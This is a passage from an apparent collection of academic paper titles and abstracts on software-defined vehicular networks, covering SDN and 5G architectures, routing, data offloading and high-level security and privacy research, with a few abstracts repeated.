life and money losses. This is even more critical when considering applications specifically aimed at improving people's safety, such as accident warning systems. To assess the scenario of such type of applications in a vehicular network, we have performed a thorough evaluation of accident warning systems under a position cheating attack. As one of the main contributions of this paper, we determine the impact of a different number of malicious vehicles on delaying the alert warning messages. In particular, we study the impact of the position of malicious vehicles on delaying alert messages. We identify the most effective strategies that could be used by malicious vehicles in order to maximize the delay of the alert message, and thus strengthen the impact of the attacker. Finally, we pinpoint that even with a small number of malicious vehicles, the positioning cheating attack can significantly increase the delay of the alert message when compared to a scenario without attack. --- paper_title: Privacy-Preserving Vehicular Communication Authentication with Hierarchical Aggregation and Fast Response paper_content: Existing secure and privacy-preserving schemes for vehicular communications in vehicular ad hoc networks face some challenges, e.g., reducing the dependence on ideal tamper-proof devices, building efficient member revocation mechanisms and avoiding computation and communication bottlenecks. To cope with those challenges, we propose a highly efficient secure and privacy-preserving scheme based on identity-based aggregate signatures. Our scheme enables hierarchical aggregation and batch verification. The individual identity-based signatures generated by different vehicles can be aggregated and verified in a batch. The aggregated signatures can be re-aggregated by a message collector (e.g., traffic management authority). With our hierarchical aggregation technique, we significantly reduce the transmission/storage overhead of the vehicles and other parties. Furthermore, existing batch verification based schemes in vehicular ad hoc networks require vehicles to wait for enough messages to perform a batch verification. In contrast, we assume that vehicles will generate messages (and the corresponding signatures) in certain time spans, so that vehicles only need to wait for a very short period before they can start the batch verification procedure. Simulation shows that a vehicle can verify the received messages with very low latency and fast response. --- paper_title: Performance Evaluation of the IEEE 802.11p WAVE Communication Standard paper_content: In order to provide Dedicated Short Range Communication (DSRC) for future vehicle-to-vehicle (V2V) communication the IEEE is currently working on the IEEE 802.11p Wireless Access in Vehicular Environments (WAVE) standard. The standard shall provide a multi-channel DSRC solution with high performance for multiple application types to be used in future Vehicular Ad Hoc Networks (VANETs). We provide a performance evaluation of the standard, considering collision probability, throughput and delay, using simulations and analytical means. WAVE can prioritize messages, however, in dense and high load scenarios the the troughput is decreases while the delay is increasing significantly. --- paper_title: An Intervehicular Communication Architecture for Safety and Entertainment paper_content: Intervehicle communication (IVC) is emerging in research prominence for the interest that it is generating in all major car manufacturers and for the benefits that its inception will produce. The specific features of IVC will allow the deployment of a wide set of possible applications, which span from road safety to entertainment. Even if, on the one hand, these applications share the common need for fast multihop message propagation, on the other hand, they possess distinct characteristics in terms of generated network traffic. The state of the art of current research only proposes solutions specifically designed for a single application (or class) that is not directly extendable to a general IVC context. Instead, we claim that a privileged architecture exists, which is able to support the whole spectrum of application classes. To this aim, we propose a novel IVC architecture that adapts its functionalities to efficiently serve applications by quickly propagating their messages over a vehicular network. We conducted an extensive set of experiments that demonstrate the efficacy of our approach. As representative case studies, we considered two application classes that, for their network traffic characteristics, are at the opposite boundaries of the application spectrum: safety and entertainment. --- paper_title: A Scalable and Quick-Response Software Defined Vehicular Network Assisted by Mobile Edge Computing paper_content: Connected vehicles provide advanced transformations and attractive business opportunities in the automotive industry. Presently, IEEE 802.11p and evolving 5G are the mainstream radio access technologies in the vehicular industry, but neither of them can meet all requirements of vehicle communication. In order to provide low-latency and high-reliability communication, an SDN-enabled network architecture assisted by MEC, which integrates different types of access technologies, is proposed. MEC technology with its on-premises feature can decrease data transmission time and enhance quality of user experience in latency-sensitive applications. Therefore, MEC plays as important a role in the proposed architecture as SDN technology. The proposed architecture was validated by a practical use case, and the obtained results have shown that it meets application- specific requirements and maintains good scalability and responsiveness. --- paper_title: Intelligent Traffic Light Controlling Algorithms Using Vehicular Networks paper_content: In this paper, we propose an intelligent traffic light controlling (ITLC) algorithm. ITLC is intended to schedule the phases of each isolated traffic light efficiently. This algorithm considers the real-time traffic characteristics of the competing traffic flows at the signalized road intersection. Moreover, we have adopted the ITLC algorithm to design a traffic scheduling algorithm for an arterial street scenario; we have thus proposed an arterial traffic light (ATL) controlling algorithm. In the ATL controlling algorithm, the intelligent traffic lights installed at each road intersection coordinate with each other to generate an efficient traffic schedule for the entire road network. We report on the performance of ITLC and ATL algorithms for several scenarios using NS-2. From the experimental results, we infer that the ITLC algorithm reduces, at each isolated traffic light, the queuing delay and increases the traffic fluency by 30% compared with the online algorithm (OAF) traffic light scheduling algorithm. The latter algorithm achieved the best performance when compared with the OAF traffic light scheduling algorithm. On the other hand, the ATL controlling algorithm increases the traffic fluency of traveling vehicles at arterial street coordinations by 70% more than the random and separate traffic light scheduling system. Furthermore, compared with the previously introduced traffic scheduling ART-SYS, the ATL controlling algorithm decreases the average delay at each traffic light by 10%. --- paper_title: A secure and efficient communication scheme with authenticated key establishment and privacy preserving for vehicular ad hoc networks paper_content: Privacy and security should be paid much more attention in secure vehicular ad hoc networks (VANETs). However, as far as we know, few researches on secure VANET protocols have addressed both the privacy issues and authenticated key establishment. Therefore, in this work, a lightweight authenticated key establishment scheme with privacy preservation to secure the communications between mobile vehicles and roadside infrastructure in a VANET is proposed, which is called SECSPP. Our proposed scheme not only accomplishes vehicle-to-vehicle and vehicle-to-roadside infrastructure authentication and key establishment for communication between members, but also integrates blind signature techniques into the scheme in allowing mobile vehicles to anonymously interact with the services of roadside infrastructure. We also show that our scheme is efficient in its implementation on mobile vehicles in comparison with other related proposals. --- paper_title: A Survey on Software-Defined Networking paper_content: Emerging mega-trends (e.g., mobile, social, cloud, and big data) in information and communication technologies (ICT) are commanding new challenges to future Internet, for which ubiquitous accessibility, high bandwidth, and dynamic management are crucial. However, traditional approaches based on manual configuration of proprietary devices are cumbersome and error-prone, and they cannot fully utilize the capability of physical network infrastructure. Recently, software-defined networking (SDN) has been touted as one of the most promising solutions for future Internet. SDN is characterized by its two distinguished features, including decoupling the control plane from the data plane and providing programmability for network application development. As a result, SDN is positioned to provide more efficient configuration, better performance, and higher flexibility to accommodate innovative network designs. This paper surveys latest developments in this active research area of SDN. We first present a generally accepted definition for SDN with the aforementioned two characteristic features and potential benefits of SDN. We then dwell on its three-layer architecture, including an infrastructure layer, a control layer, and an application layer, and substantiate each layer with existing research efforts and its related research areas. We follow that with an overview of the de facto SDN implementation (i.e., OpenFlow). Finally, we conclude this survey paper with some suggested open research challenges. --- paper_title: OpenFlow: enabling innovation in campus networks paper_content: This whitepaper proposes OpenFlow: a way for researchers to run experimental protocols in the networks they use every day. OpenFlow is based on an Ethernet switch, with an internal flow-table, and a standardized interface to add and remove flow entries. Our goal is to encourage networking vendors to add OpenFlow to their switch products for deployment in college campus backbones and wiring closets. We believe that OpenFlow is a pragmatic compromise: on one hand, it allows researchers to run experiments on heterogeneous switches in a uniform way at line-rate and with high port-density; while on the other hand, vendors do not need to expose the internal workings of their switches. In addition to allowing researchers to evaluate their ideas in real-world traffic settings, OpenFlow could serve as a useful campus component in proposed large-scale testbeds like GENI. Two buildings at Stanford University will soon run OpenFlow networks, using commercial Ethernet switches and routers. We will work to encourage deployment at other schools; and We encourage you to consider deploying OpenFlow in your university network too --- paper_title: A Buffer-Aware QoS Streaming Approach for SDN-Enabled 5G Vehicular Networks paper_content: With the progress of network technology in recent years, multimedia streaming applications have become increasingly popular. However, it is difficult to achieve quality of service and efficiency for multimedia streaming over vehicular networks because of the high mobility feature. Over the existing network architecture, it is difficult to immediately analyze the status of the entire network, and then establish the rules of allocation and management. However, the novel network architecture, software-defined networking, offers other options for making network management more efficient, especially for the 5G network environment. Hence, a buffer-aware streaming approach is proposed to allow users to play multimedia streaming over vehicular 5G networks, in the case of handover between different eNodeBs, to achieve minimum delay and have better quality of service. According to the user's mobility information, the status of the player buffer, and the current strength of the network signal, the proposed approach can provide the transmission strategy of multimedia streaming to the SDN controller. Finally, the experimental results proved that the proposed approach is able to not only adjust the priority of streaming content segments with the buffer and mobility status of user equipment to effectively retain overall streaming services quality, but also avoid the delay of streaming content transmission for 5G vehicular networks. --- paper_title: 5G next generation VANETs using SDN and fog computing framework paper_content: The growth of technical revolution towards 5G Next generation networks is expected to meet various communication requirements of future Intelligent Transportation Systems (ITS). Motivated by the consumer needs for variety of ITS applications, bandwidth, high speed and ubiquity, researches are currently exploring different network architectures and techniques, which could be employed in Next generation ITS. To provide flexible network management, control and high resource utilization in Vehicular Ad-hoc Networks (VANETs) on large scale, a new hierarchical 5G Next generation VANET architecture is proposed. The key idea of this holistic architecture is to integrate the centralization and flexibility of Software Defined Networking (SDN) and Cloud-RAN (CRAN), with 5G communication technologies, to effectively allocate resources with a global view. Moreover, a fog computing framework (comprising of zones and clusters) has been proposed at the edge, to avoid frequent handovers between vehicles and RSUs. The transmission delay, throughput and control overhead on controller are analyzed and compared with other architectures. Simulation results indicate reduced transmission delay and minimized control overhead on controllers. Moreover, the throughput of proposed system is also improved. --- paper_title: 5G Software Defined Vehicular Networks paper_content: With the emergence of 5G mobile communication systems and software defined networks, not only could the performance of vehicular networks be improved, but also new applications of vehicular networks are required by future vehicles (e.g., pilotless vehicles). To meet requirements of intelligent transportation systems, a new vehicular network architecture integrated with 5G mobile communication technologies and software defined networking is proposed in this article. Moreover, fog cells have been proposed to flexibly cover vehicles and avoid frequent handover between vehicles and roadside units. Based on the proposed 5G software defined vehicular networks, the transmission delay and throughput are analyzed and compared. Simulation results indicate that there is a minimum transmission delay of 5G software defined vehicular networks considering different vehicle densities. Moreover, the throughput of fog cells in 5G software defined vehicular networks is better than the throughput of traditional transportation management systems. --- paper_title: An Architecture for Hierarchical Software-Defined Vehicular Networks paper_content: With the recent advances in the telecommunications and auto industries, we have witnessed growing interest in ITS, of which VANETs are an essential component. SDN can bring advantages to ITS through its ability to provide flexibility and programmability to networks through a logically centralized controller entity that has a comprehensive view of the network. However, as the SDN paradigm initially had fixed networks in mind, adapting it to work on VANETs requires some changes to address particular characteristics of this kind of scenario, such as the high mobility of its nodes. There has been initial work on bringing SDN concepts to vehicular networks to expand its abilities to provide applications and services through the increased flexibility, but most of these studies do not directly tackle the issue of loss of connectivity with said controller entity. In this article, we propose a hierarchical SDN-based vehicular architecture that aims to have improved performance in the situation of loss of connection with the central SDN controller. Simulation results show that our proposal outperforms traditional routing protocols in the scenario where there is no coordination from the central SDN controller. --- paper_title: Cooperative Data Scheduling in Hybrid Vehicular Ad Hoc Networks: VANET as a Software Defined Network paper_content: This paper presents the first study on scheduling for cooperative data dissemination in a hybrid infrastructure-to-vehicle (I2V) and vehicle-to-vehicle (V2V) communication environment. We formulate the novel problem of cooperative data scheduling (CDS). Each vehicle informs the road-side unit (RSU) the list of its current neighboring vehicles and the identifiers of the retrieved and newly requested data. The RSU then selects sender and receiver vehicles and corresponding data for V2V communication, while it simultaneously broadcasts a data item to vehicles that are instructed to tune into the I2V channel. The goal is to maximize the number of vehicles that retrieve their requested data. We prove that CDS is NP-hard by constructing a polynomial-time reduction from the Maximum Weighted Independent Set (MWIS) problem. Scheduling decisions are made by transforming CDS to MWIS and using a greedy method to approximately solve MWIS. We build a simulation model based on realistic traffic and communication characteristics and demonstrate the superiority and scalability of the proposed solution. The proposed model and solution, which are based on the centralized scheduler at the RSU, represent the first known vehicular ad hoc network (VANET) implementation of software defined network (SDN) concept. --- paper_title: Delay-Minimization Routing for Heterogeneous VANETs With Machine Learning Based Mobility Prediction paper_content: Establishing and maintaining end-to-end connections in a vehicular ad hoc network (VANET) is challenging due to the high vehicle mobility, dynamic inter-vehicle spacing, and variable vehicle density. Mobility prediction of vehicles can address the aforementioned challenge, since it can provide a better routing planning and improve overall VANET performance in terms of continuous service availability. In this paper, a centralized routing scheme with mobility prediction is proposed for VANET assisted by an artificial intelligence powered software-defined network (SDN) controller. Specifically, the SDN controller can perform accurate mobility prediction through an advanced artificial neural network technique. Then, based on the mobility prediction, the successful transmission probability and average delay of each vehicle's request under frequent network topology changes can be estimated by the roadside units (RSUs) or the base station (BS). The estimation is performed based on a stochastic urban traffic model in which the vehicle arrival follows a non-homogeneous Poisson process. The SDN controller gathers network information from RSUs and BS that are considered as the switches. Based on the global network information, the SDN controller computes optimal routing paths for switches (i.e., BS and RSU). While the source vehicle and destination vehicle are located in the coverage area of the same switch, further routing decision will be made by the RSUs or the BS independently to minimize the overall vehicular service delay. The RSUs or the BS schedule the requests of vehicles by either vehicle-to-vehicle or vehicle-to-infrastructure communication, from the source vehicle to the destination vehicle. Simulation results demonstrate that our proposed centralized routing scheme outperforms others in terms of transmission delay, and the transmission performance of our proposed routing scheme is more robust with varying vehicle velocity. --- paper_title: QoE-Based Flow Management in Software Defined Vehicular Networks paper_content: In vehicular networks, high mobility and limited transmission range of Road-Side Units (RSU) cause dynamic topological changes and result with interference occurred by transmission of vehicles. Moreover, due to the limited bandwidth of IEEE 802.11p based vehicular communication, providing a fair share of network resources among vehicles is essential for an efficient network management. Therefore, flow and interference management challenges cause a degradation in percentage of flow satisfied by effecting quality of communication and enhancing interference in vehicular networks. These aforementioned two challenges can be mitigated with Software-Defined Networking (SDN) paradigm where a centralized controller can schedule data flows and then coordinate power level of vehicles. Hence, in this paper, the cooperation of SDN and IEEE 802.11p based vehicular communication has been proposed in vehicular networks. We present a novel software- defined flow and power management model implemented into controller. Here, we classify vehicles based on Quality of Experience (QoE) and model RSUs with a queuing theoretic approach. Then the proposed model is used to detect unsatisfactory vehicles and estimate effective and accurate amount of transmission power of these vehicles so that unsatisfactory vehicles will be served a new assigned RSU with optimal signal level. Moreover, we redefine flow label field in OpenFlow flow table so that controller can manage to RSUs by imposing some behaviors. Numerical results show how a better flow satisfied can be maintained by implementing this idea. --- paper_title: Towards software-defined VANET: Architecture and services paper_content: Vehicular Ad Hoc Networks (VANETs) have in recent years been viewed as one of the enabling technologies to provide a wide variety of services, such as vehicle road safety, enhanced traffic and travel efficiency, and convenience and comfort for passengers and drivers. However, current VANET architectures lack in flexibility and make the deployment of services/protocols in large-scale a hard task. In this paper, we demonstrate how Software-Defined Networking (SDN), an emerging network paradigm, can be used to provide the flexibility and programmability to networks and introduces new services and features to today's VANETs. We take the concept of SDN, which has mainly been designed for wired infrastructures, especially in the data center space, and propose SDN-based VANET architecture and its operational mode to adapt SDN to VANET environments. We also discuss benefits of a Software-Defined VANET and the services that can be provided. We demonstrate in simulation the feasibility of a Software-Defined VANET by comparing SDN-based routing with traditional MANET/VANET routing protocols. We also show in simulation fallback mechanisms that must be provided to apply the SDN concept into mobile wireless scenarios, and demonstrate one of the possible services that can be provided by a Software-Defined VANET. --- paper_title: An efficient service channel allocation scheme in SDN-enabled VANETs paper_content: Providing infotainment services in Vehicular Adhoc Networks (VANETs) is a key functionality for the future intelligent transportation systems. However, the unique features of vehicular networks such as high velocity, intermittent communication links and dynamic density can induce severe performances degradation for infotainment services running on the six Service Channels (SCHs) available in the Dedicated Short Range Communication (DSRC). Although, the Wireless Access in the Vehicular Environment (WAVE) has been proposed for VANETs to support these applications and guarantee the QoS by proposing four different access categories, no service channel scheme has been proposed to ensure fair and interference-aware allocation. To fill this gap, in this work we propose ESCiVA, an Efficient Service Channel allocation Scheme in SDN-enabled VAnets to balance service traffic on the six SCHs and mitigate interferences between services provided on adjacent channels. Extensive simulation results confirm that ESCiVA outperforms the basic SCH allocation method, defined in the WAVE standard. --- paper_title: Cost-Efficient Sensory Data Transmission in Heterogeneous Software-Defined Vehicular Networks paper_content: Sensing and networking have been regarded as key enabling technologies of future smart vehicles. Sensing allows vehicles to be context awareness, while networking empowers context sharing among ambients. Existing vehicular communication solutions mainly rely on homogeneous network, or heterogeneous network via data offloading. However, today’s vehicular network implementations are highly heterogeneous. Therefore, conventional homogeneous communication and data offloading may not be able to satisfy the requirement of the emerging vehicular networking applications. In this paper, we apply the software-defined network (SDN) to the heterogeneous vehicular networks to bridge the gaps. With SDN, heterogeneous network resources can be managed with a unified abstraction. Moreover, we propose an SDN-based wireless communication solution, which can schedule different network resources to minimize communication cost. We investigate the problems in both single and multiple hop cases. We also evaluate the proposed approaches using traffic traces. The effectiveness and the efficiency are validated by the results. --- paper_title: Vehicle Software Updates Distribution with SDN and Cloud Computing paper_content: Vehicles have embedded software dedicated to diverse functionality ranging from driving assistance to entertainment. Vehicle manufacturers often need to perform updates on software installed on vehicles. Software updates can either be pushed by the manufacturer to install fixes, or be requested by vehicle owners to upgrade some functionality. We propose an architecture for distributing software updates on vehicles based on SDN and cloud computing. We show that using SDN, the emergent networking paradigm, which provides on-demand network programmability, adds substantial flexibility for deploying software updates on vehicles. We propose solutions for how vehicular networks can be modeled as connectivity graphs that can be used as input for the SDN architecture. After constructing graphs, we present an SDN-based solution where different frequency bands are assigned to different graph edges to improve the network performance. --- paper_title: SDVN: enabling rapid network innovation for heterogeneous vehicular communication paper_content: With the advances in telecommunications, more and more devices are connected to the Internet and getting smart. As a promising application scenario for carrier networks, vehicular communication has enabled many traffic-related applications. However, the heterogeneity of wireless infrastructures and the inflexibility in protocol deployment hinder the real world application of vehicular communications. SDN is promising to bridge the gaps through unified network abstraction and programmability. In this research, we propose an SDN-based architecture to enable rapid network innovation for vehicular communications. Under this architecture, heterogeneous wireless devices, including vehicles and roadside units, are abstracted as SDN switches with a unified interface. In addition, network resources such as bandwidth and spectrum can also be allocated and assigned by the logically centralized control plane, which provides a far more agile configuration capability. Besides, we also study several cases to highlight the advantages of the architecture, such as adaptive protocol deployment and multiple tenants isolation. Finally, the feasibility and effectiveness of the proposed architecture and cases are validated through traffic-trace-based simulation. --- paper_title: Data Offloading in 5G-Enabled Software-Defined Vehicular Networks: A Stackelberg-Game-Based Approach paper_content: Data offloading using vehicles is one of the most challenging tasks to perform due to the high mobility of vehicles. There are many solutions available for this purpose, but due to the inefficient management of data along with the control decisions, these solutions are not adequate to provide data offloading by making use of the available networks. Moreover, with the advent of 5G and related technologies, there is a need to cope with high speed and traffic congestion in the existing infrastructure used for data offloading. Hence, to make intelligent decisions for data offloading, an SDN-based scheme is presented in this article. In the proposed scheme, an SDNbased controller is designed that makes decisions for data offloading by using the priority manager and load balancer. Using these two managers in SDN-based controllers, traffic routing is managed efficiently even with an increase in the size of the network. Moreover, a single-leader multi-follower Stackelberg game for network selection is also used for data offloading. The proposed scheme is evaluated with respect to several parameters where its performance was found to be superior in comparison to the existing schemes. --- paper_title: Link Stability Based Optimized Routing Framework for Software Defined Vehicular Networks paper_content: The dynamic nature of vehicular networks imposes a lot of challenges in multihop data transmission as links are vulnerable in their existence due to associated mobility of vehicles. Thus, packets frequently find it difficult to get through to the destination due to the limited lifetimes of links. The conventional broadcasting based vehicular ad-hoc network (VANET) routing protocols struggle to accurately analyze the link dynamicity due to the unavailability of global information and inefficiencies in their route discovering schemes. However, with the recently emerged software defined vehicular network (SDVN) paradigm, link stability can be better scrutinized pertaining to the availability of global network information. Thus, in this paper, we introduce an optimization based novel packet routing scheme with a source routing based flow instantiation (FI) operation for SDVN. The routing framework closely analyzes the stability of links in selecting the routes and the problem is formulated as a minimum cost capacitated flow problem. Furthermore, an incremental packet allocation scheme is proposed to solve the routing problem in a less time complexity. The objective is to find multiple shortest paths which are collectively stable enough to deliver a given number of packets. The FI scheme efficiently delivers and caches flow information in the required nodes with a reduced extent of communication with the control plane. With the help of realistic simulation, we show that the proposed routing framework excels in terms of the performance over the existing routing schemes of both SDVN and conventional VANET. --- paper_title: Multi-level SDN with vehicles as fog computing infrastructures: A new integrated architecture for 5G-VANETs paper_content: The spectacular emergence of connected and autonomous vehicles coupled with their evergrowing demands on processing, computation and communication resources pose new challenges to provide reliable vehicular services. Here, a combination of a multi-level SdN Approach and a foG computing architEcture based on Vehicles as Infrastructures paradigm, called VISAGE, is proposed for future 5G-VANET systems. By using vehicles as fog infrastructures and integrating them with local SDN controllers, the QoS of vehicular applications and protocols becomes more efficient in terms of computation time and communication delays. This is explained by offloading the computing services from the cloud to the edge of networks, making use of the abundant resources offered by vehicles and making network control decisions locally. Through three typical uses cases of our proposed 5G era vehicular architecture, we show the promising benefits of our approach in terms of communication and computation capacities. --- paper_title: Software defined networking-based vehicular Adhoc Network with Fog Computing paper_content: Vehicular Adhoc Networks (VANETs) have been attracted a lot of research recent years. Although VANETs are deployed in reality offering several services, the current architecture has been facing many difficulties in deployment and management because of poor connectivity, less scalability, less flexibility and less intelligence. We propose a new VANET architecture called FSDN which combines two emergent computing and network paradigm Software Defined Networking (SDN) and Fog Computing as a prospective solution. SDN-based architecture provides flexibility, scalability, programmability and global knowledge while Fog Computing offers delay-sensitive and location-awareness services which could be satisfy the demands of future VANETs scenarios. We figure out all the SDN-based VANET components as well as their functionality in the system. We also consider the system basic operations in which Fog Computing are leveraged to support surveillance services by taking into account resource manager and Fog orchestration models. The proposed architecture could resolve the main challenges in VANETs by augmenting Vehicle-to-Vehicle (V2V), Vehicle-to-Infrastructure (V2I), Vehicle-to-Base Station communications and SDN centralized control while optimizing resources utility and reducing latency by integrating Fog Computing. Two use-cases for non-safety service (data streaming) and safety service (Lane-change assistance) are also presented to illustrate the benefits of our proposed architecture. --- paper_title: A Scalable and Quick-Response Software Defined Vehicular Network Assisted by Mobile Edge Computing paper_content: Connected vehicles provide advanced transformations and attractive business opportunities in the automotive industry. Presently, IEEE 802.11p and evolving 5G are the mainstream radio access technologies in the vehicular industry, but neither of them can meet all requirements of vehicle communication. In order to provide low-latency and high-reliability communication, an SDN-enabled network architecture assisted by MEC, which integrates different types of access technologies, is proposed. MEC technology with its on-premises feature can decrease data transmission time and enhance quality of user experience in latency-sensitive applications. Therefore, MEC plays as important a role in the proposed architecture as SDN technology. The proposed architecture was validated by a practical use case, and the obtained results have shown that it meets application- specific requirements and maintains good scalability and responsiveness. --- paper_title: V2V Data Offloading for Cellular Network Based on the Software Defined Network (SDN) Inside Mobile Edge Computing (MEC) Architecture paper_content: Data offloading plays an important role for the mobile data explosion problem that occurs in cellular networks. This paper proposed an idea and control scheme for offloading vehicular communication traffic in the cellular network to vehicle to vehicle (V2V) paths that can exist in vehicular ad hoc networks (VANETs). A software-defined network (SDN) inside the mobile edge computing (MEC) architecture, which is abbreviated as the SDNi-MEC server, is devised in this paper to tackle the complicated issues of VANET V2V offloading. Using the proposed SDNi-MEC architecture, each vehicle reports its contextual information to the context database of the SDNi-MEC server, and the SDN controller of the SDNi-MEC server calculates whether there is a V2V path between the two vehicles that are currently communicating with each other through the cellular network. This proposed method: 1) uses each vehicle’s context; 2) adopts a centralized management strategy for calculation and notification; and 3) tries to establish a VANET routing path for paired vehicles that are currently communicating with each other using a cellular network. The performance analysis for the proposed offloading control scheme based on the SDNi-MEC server architecture shows that it has better throughput in both the cellular networking link and the V2V paths when the vehicle’s density is in the middle. --- paper_title: SDN VANETs in 5G: An architecture for resilient security services paper_content: Vehicular ad-Hoc Networks (VANETs) have been promoted as a key technology that can provide a wide variety of services such as traffic management, passenger safety, as well as travel convenience and comfort. VANETs are now proposed to be part of the upcoming Fifth Generation (5G) technology, integrated with Software Defined Networking (SDN), as key enabler of 5G. The technology of fog computing in 5G turned out to be an adequate solution for faster processing in delay sensitive application, such as VANETs, being a hybrid solution between fully centralized and fully distributed networks. In this paper, we propose a three-way integration between VANETs, SDN, and 5G for a resilient VANET security design approach, which strikes a good balance between network, mobility, performance and security features. We show how such an approach can secure VANETs from different types of attacks such as Distributed Denial of Service (DDoS) targeting either the controllers or the vehicles in the network, and how to trace back the source of the attack. Our evaluation shows the capability of the proposed system to enforce different levels of real-time user-defined security, while maintaining low overhead and minimal configuration. --- paper_title: Control Plane Optimization in Software-Defined Vehicular Ad Hoc Networks paper_content: The vehicle ad hoc network (VANET) is an emerging network technology that is expected to be cost-effective and adaptable, making it ideal to provide network connection service to drivers and passengers on today's roads. In the next generation of VANETs with fifth-generation (5G) networks, software-defined networking (SDN) technology will play a very important role in network management. However, for infotainment applications, high latency in VANET communication imposes a great challenge for network management, whereas direct communication through the cellular networks brings high cost. In this paper, we present an optimizing strategy to balance the latency requirement and the cost on cellular networks, in which we encourage vehicles to send the SDN control requests through the cellular networks by rebating network bandwidth. Furthermore, we model the interaction of the controller and vehicles as a two-stage Stackelberg game and analyze the game equilibrium. From the experimental results, the optimal rebating strategy provides smaller latency than other control plane structures. --- paper_title: A Software Defined Network architecture for GeoBroadcast in VANETs paper_content: This paper proposes a Software Defined Network (SDN) architecture for GeoBroadcast in VANETs. We have implemented a component to automatically manage the geographical location of Road Side Units (RSUs), which are used as a basis for our GeoBroadcast routing. GeoBroadcast in a vehicular network supports periodic broadcast messages from a source vehicle to the destination vehicles that are located in a specific geographical region. In existing Intelligent Transport Systems (ITS), the GeoBroadcast mechanism can be implemented using traditional IP networking. Typically, every periodic warning messages received at nearest RSU from the source must be routed to the control center in ITS, where it is redirected to every other RSUs, that are located in the destination geographical region for broadcasting. As a result, huge overhead in the control center is produced and higher network bandwidth is consumed. However, in our SDN based GeoBroadcast mechanism, the first warning message received by the source RSU is sent to the SDN controller as a packet-in message. The SDN controller will decode the packet-in message and use topological and geographical information to set up the routing paths to the destination RSUs, by installing appropriate flow entries on the corresponding RSUs and intermediate switches, for the following periodic warning messages that are to be broadcasted. As per our simulation with OpenNet a significant reduction by 84% in controller overhead, 60% in network bandwidth consumption, and 81% in latency are achieved. --- paper_title: Security and Privacy Issues in Vehicular Named Data Networks: An Overview paper_content: A tremendous amount of content and information are exchanging in a vehicular environment between vehicles, roadside units, and the Internet. This information aims to improve the driving experience and human safety. Due to the VANET’s properties and application characteristics, the security becomes an essential aspect and a more challenging task. On the contrary, named data networking has been proposed as a future Internet architecture that may improve the network performance, enhance content access and dissemination, and decrease the communication delay. NDN uses a clean design based on content names and Interest-Data exchange model. In this paper, we focus on the vehicular named data networking environment, targeting the security attacks and privacy issues. We present a state of the art of existing VANET attacks and how NDN can deal with them. We classified these attacks based on the NDN perspective. Furthermore, we define various challenges and issues faced by NDN-based VANET and highlight future research directions that should be addressed by the research community. --- paper_title: QoE-Based Flow Management in Software Defined Vehicular Networks paper_content: In vehicular networks, high mobility and limited transmission range of Road-Side Units (RSU) cause dynamic topological changes and result with interference occurred by transmission of vehicles. Moreover, due to the limited bandwidth of IEEE 802.11p based vehicular communication, providing a fair share of network resources among vehicles is essential for an efficient network management. Therefore, flow and interference management challenges cause a degradation in percentage of flow satisfied by effecting quality of communication and enhancing interference in vehicular networks. These aforementioned two challenges can be mitigated with Software-Defined Networking (SDN) paradigm where a centralized controller can schedule data flows and then coordinate power level of vehicles. Hence, in this paper, the cooperation of SDN and IEEE 802.11p based vehicular communication has been proposed in vehicular networks. We present a novel software- defined flow and power management model implemented into controller. Here, we classify vehicles based on Quality of Experience (QoE) and model RSUs with a queuing theoretic approach. Then the proposed model is used to detect unsatisfactory vehicles and estimate effective and accurate amount of transmission power of these vehicles so that unsatisfactory vehicles will be served a new assigned RSU with optimal signal level. Moreover, we redefine flow label field in OpenFlow flow table so that controller can manage to RSUs by imposing some behaviors. Numerical results show how a better flow satisfied can be maintained by implementing this idea. --- paper_title: Toward Secure Software Defined Vehicular Networks: Taxonomy, Requirements, and Open Issues paper_content: The emerging software defined vehicular networking (SDVN) paradigm promises to dramatically simplify network management and enable innovation through network programmability. Despite noticeable advances of SDNs in wired networks, it is also becoming an indispensable component that potentially provides flexible and well managed next-generation wireless networks, gaining massive attention from both industry and academia. In spite of all the hype surrounding emerging SDVNs, exploiting its full potential is demanding, and security is still the key concern and an equally arresting challenge. On the contrary, the complete transformation of the network into an SDN structure is still questionable, and the security and dependability of SDNs have largely been neglected topics. Moreover, the logical centralization of network intelligence and the tremendously evolving landscape of digital threats and cyber attacks that predominantly target emerging SDVNs will have even more devastating effects than they are in simple networks. Besides, the deployment of the SDVNs' novel entities and several architectural components drive new security threats and vulnerabilities. Since the SDVNs architectural layers and their corresponding APIs are heavily dependent on each other, this article aims to present a systematic top-down approach to tackle the potential security vulnerabilities, attacks, and challenges pertaining to each layer. The article contributes by presenting the security implications of the emerging SDVNs to devise comprehensive thematic core layered taxonomies together with external communication APIs. Moreover, we also describe the potential requirements and key enablers toward secure SDVNs. Finally, a plethora of open security research issues are presented that may be deemed appropriate for young researchers and professionals around the globe to tackle in anticipation of secure SDVNs. --- paper_title: Enabling SDN in VANETs: What is the Impact on Security? paper_content: The demand for safe and secure journeys over roads and highways has been growing at a tremendous pace over recent decades. At the same time, the smart city paradigm has emerged to improve citizens' quality of life by developing the smart mobility concept. Vehicular Ad hoc NETworks (VANETs) are widely recognized to be instrumental in realizing such concept, by enabling appealing safety and infotainment services. Such networks come with their own set of challenges, which range from managing high node mobility to securing data and user privacy. The Software Defined Networking (SDN) paradigm has been identified as a suitable solution for dealing with the dynamic network environment, the increased number of connected devices, and the heterogeneity of applications. While some preliminary investigations have been already conducted to check the applicability of the SDN paradigm to VANETs, and its presumed benefits for managing resources and mobility, it is still unclear what impact SDN will have on security and privacy. Security is a relevant issue in VANETs, because of the impact that threats can have on drivers' behavior and quality of life. This paper opens a discussion on the security threats that future SDN-enabled VANETs will have to face, and investigates how SDN could be beneficial in building new countermeasures. The analysis is conducted in real use cases (smart parking, smart grid of electric vehicles, platooning, and emergency services), which are expected to be among the vehicular applications that will most benefit from introducing an SDN architecture. --- paper_title: Software defined networking-based vehicular Adhoc Network with Fog Computing paper_content: Vehicular Adhoc Networks (VANETs) have been attracted a lot of research recent years. Although VANETs are deployed in reality offering several services, the current architecture has been facing many difficulties in deployment and management because of poor connectivity, less scalability, less flexibility and less intelligence. We propose a new VANET architecture called FSDN which combines two emergent computing and network paradigm Software Defined Networking (SDN) and Fog Computing as a prospective solution. SDN-based architecture provides flexibility, scalability, programmability and global knowledge while Fog Computing offers delay-sensitive and location-awareness services which could be satisfy the demands of future VANETs scenarios. We figure out all the SDN-based VANET components as well as their functionality in the system. We also consider the system basic operations in which Fog Computing are leveraged to support surveillance services by taking into account resource manager and Fog orchestration models. The proposed architecture could resolve the main challenges in VANETs by augmenting Vehicle-to-Vehicle (V2V), Vehicle-to-Infrastructure (V2I), Vehicle-to-Base Station communications and SDN centralized control while optimizing resources utility and reducing latency by integrating Fog Computing. Two 